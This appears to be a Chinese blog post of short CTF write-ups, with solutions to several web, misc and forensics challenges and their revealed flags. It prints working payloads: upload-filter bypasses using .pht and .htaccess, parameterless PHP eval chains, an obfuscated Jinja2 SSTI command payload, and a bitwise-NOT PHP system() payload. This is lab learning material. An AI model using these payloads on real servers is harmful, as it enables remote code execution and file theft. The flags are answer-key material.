youbing的博客

试了一圈只有pht可以上传,用pht文件执行命令得到文件GIF<?=nl /f*;然后抓包修改Content-Type上传再访问上传地址得到flag

无参构造题发现readfile(array_rand(array_flip(scandir(pos(localeconv())))));似乎没有被限制，尝试输入查看源码得到flag

这道题提交一句话木马抓包改后缀，题目提示不能带ph的后缀，先用.jpg格式上传看看还有没有其它限制，发现<?被限制了这里用script方法的一句话木马，再用.htaccess文件将jpg变成php

Muma.jpg:

.htaccess:

AddType application/x-httpd-php .jpg

再访问查看phpinfo()找到flag

这里测试发现{{}}被过滤了，用{%print()%}。.和[]被过滤使用|attr使用flask里的lipsum执行命令构造payload编码得到： test?url={%print((((lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f"))|attr("\u0067\u0065\u0074")("os"))|attr("\u0070\u006f\u0070\u0065\u006e")("\u0074\u0061\u0063\u0020\u002f\u0066\u002a"))|attr("\u0072\u0065\u0061\u0064")())%} 输入得到flag 

这道题禁用了全部字母和一些特殊符号，只能用取反字符串的方法，先尝试将system(“ls /”)取反(~'%8C%86%8C%8B%9A%92')(~'%93%8C%DF%D0');发现了flllllaaaaaaggggggg，system(“cat /flllllaaaaaaggggggg”)取反(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98)；

得到flag

找了一圈没有找到有用信息，用dirsearch发现有很多git目录，用githack下载到index.php和flag.php查看flag.php内容不完整，查看index.php

"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { // echo $_GET['exp']; @eval($_GET['exp']); } else{ die("还差一点哦！"); } } else{ die("再好好想想！"); } } else{ die("还想读flag，臭弟弟！"); } } // highlight_file(__FILE__); ?>

这里构造payload,用loacleconv返回一个.pos将.返回到payload让scandir能够读出当前目录下的文件，arry_reverse()以相反的顺序输出,再next提取下一个.，最后highlight显示

?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

看题目源码特征像是ssti类型的题，用fenjing扫一下发现漏洞ls /扫到flag，cat /flag得到flag

题目提示了flask,用fenjing试试看，发现存在漏洞，ls /，发现有一个叫Th1s_is__F1114g

的文件cat /Th1s_is__F1114g得到flag

NSSCTF{022e0211-6775-4e78-9af8-210cc608f69a}

这里发现双声道刚好相反对称，将通道分离在混合渲染得到一段摩斯电码

就得到SCTFDES1R3_DRIVES_INT0_VAPORW@VES按照格式改成

NSSCTF{DES1R3_DRIVES_INT0_VAPORW@VES}

题目附件压缩包发现打不开，用编辑器查看发现开头标识不对，改为正确的之后解压得到

Flag